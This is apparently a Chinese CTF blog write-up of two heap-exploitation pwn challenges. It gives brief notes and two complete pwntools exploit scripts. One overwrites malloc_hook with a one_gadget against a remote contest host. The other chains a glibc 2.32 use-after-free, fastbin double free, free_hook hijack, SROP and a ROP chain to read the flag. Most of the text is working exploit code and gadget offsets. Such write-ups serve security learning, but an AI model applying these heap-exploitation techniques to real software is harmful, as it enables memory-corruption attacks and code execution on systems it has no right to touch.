标签:line bin lib puts pop 大小 rem rop sse
起床做了简单的pwn1,后面又放了题目,但是??突然好困,看了会没思路就去睡觉了(真滴摸鱼
记录一下做的题目和复现的记录吧
挺简单的,一开始能开个堆,会打印指针的值,也不限制大小,直接调用mmap开大堆,根据调试能得出libc基址
然后offest能任意地址写0x10的内容,直接打malloc_hook ,realloc_hook修栈
from pwn import*
#p = process(‘./fruitpie‘)
ip = ‘54f57bff-61b7-47cf-a0ff-f23c4dc7756a.machine.dasctf.com‘
port = 50102
p = remote(ip,port)
elf = ELF(‘./fruitpie‘)
libc = elf.libc
context.log_level = ‘debug‘
p.sendlineafter(‘malloc:‘,str(9999999))
p.recvuntil(‘0x‘)
leak = int(p.recvline()[:-1],16)
info(‘leak:‘+hex(leak))
libc_base = leak+0x989ff0
info(‘libc_base:‘+hex(libc_base))
#gdb.attach(p)
malloc_hook = libc_base+libc.sym[‘__malloc_hook‘]
realloc = libc_base+libc.sym[‘realloc‘]
og = libc_base+0x4f3c2
off = ‘d75c18‘ # off to realloc_hook
p.sendlineafter(‘Offset:‘,off)
#gdb.attach(p)
p.sendafter(‘Data:‘,p64(og)+p64(realloc+4))
p.interactive()
赛后复现的
2.32下的堆题,存在uaf,泄漏堆地址,libc都很容易,但是没有edit,很难绕过key指针,但是可以用fastbin。
在stash机制下,fastbin attack可以做到像tcache attack任意地址写,所以我们的思路就是先填满tcache,把libc和堆地址都泄漏了
并且在堆上布置好srop的数据和rop链,最后double free打free_hook触发srop,栈迁移到堆上执行rop。
不过要注意一点,在libc2.29之后,setcontext的参数变成了rdx,所以需要一个gadget去控制rdx的值
gadget
mov rdx, qword ptr [rdi + 8]
mov qword ptr [rsp], rax
call qword ptr [rdx + 0x20]
exp:
from pwn import*
p = process(‘./clown‘)
elf = ELF(‘./clown‘)
libc = elf.libc
context.log_level = ‘debug‘
context.arch = ‘amd64‘
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
rl = lambda : p.recvline(keepends = False)
ss = lambda s : success(s)
dbg = lambda : gdb.attach(p)
irt = lambda : p.interactive()
def cmd(idx):
sla(‘>> ‘,str(idx))
def add(size,content):
cmd(1)
sla(‘Size:‘,str(size))
sa(‘Content:‘,content)
def delete(idx):
cmd(2)
sla("Index:",str(idx))
def show(idx):
cmd(3)
sla("Index",str(idx))
def expliot():
add(0x68,b‘a‘) # 0
delete(0)
show(0)
# dbg()
rl()
key = u64(rl().ljust(8,b‘\x00‘))
ss(‘key:‘+hex(key))
heap = key << 12
ss(‘heap:‘+hex(heap))
for i in range(0,9): # 1 - 9
add(0x68,b‘a‘)
# for i in range(7,0,-1):
# delete(i)
# index 8,9 used in fastbin double free
# delete(8)
for i in range(0,8): # 10 - 16
add(0xd0,b‘a‘)
delete(10)
for i in range(3,9):
delete(i+9)
delete(11)
add(0x68,b‘\x60‘)
show(18)
libc_base = u64(ru(‘\x7f‘)[-6:].ljust(8,b‘\x00‘))-192-16-libc.sym[‘__malloc_hook‘]
ss(‘libc:‘+hex(libc_base))
pop_rdi = 0x00000000000277d6 + libc_base
pop_rsi = 0x0000000000032032 + libc_base
pop_rdx = 0x00000000000c800d + libc_base
ret = 0x000000000002636f + libc_base
gadget = 0x0000000000124990 + libc_base
open = libc.sym[‘open‘] + libc_base
read = libc.sym[‘read‘] + libc_base
puts = libc.sym[‘puts‘] + libc_base
setcontext = libc.sym[‘setcontext‘] + libc_base
free_hook = libc.sym[‘__free_hook‘] + libc_base
for i in range(7,0,-1):
delete(i)
#index 8,9 used in fastbin double free
delete(8)
delete(9)
delete(8)
for i in range(0,7):
add(0x68,b‘a‘)
payload = b‘a‘*0x20
payload += p64(setcontext+53)+b‘a‘*8
payload += b‘a‘*0x70
payload += p64(heap+0xea0) #rsp
payload += p64(ret) #rcx
flag = heap+0xf28
rop = p64(pop_rdi) + p64(flag)
rop += p64(pop_rsi)+p64(0)
rop += p64(pop_rdx)+p64(0)
rop += p64(open)
rop += p64(pop_rdi)+p64(3)
rop += p64(pop_rsi)+p64(heap+0x100)
rop += p64(pop_rdx)+p64(0x40)
rop += p64(read)
rop += p64(pop_rdi)+p64(heap+0x100)
rop += p64(puts)
rop += b‘flag\x00‘
add(0x28,p64(0)+p64(heap+0xd90)) # 0x7e0 26
add(0x100,payload) # frame 27
add(0x100,rop) # rop ea0 28
add(0x68,p64(key^free_hook))
add(0x68,b‘a‘)
add(0x68,b‘a‘)
add(0x68,p64(gadget))
# dbg()
delete(26)
irt()
if __name__ == ‘__main__‘:
expliot()
‘‘‘
0x00000000000277d6 : pop rdi ; ret
0x0000000000032032 : pop rsi ; ret
0x00000000000c800d : pop rdx ; ret
0x0000000000124990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
0x000000000002636f : ret
‘‘‘
标签:line bin lib puts pop 大小 rem rop sse
原文地址:https://www.cnblogs.com/z2yh/p/14604195.html
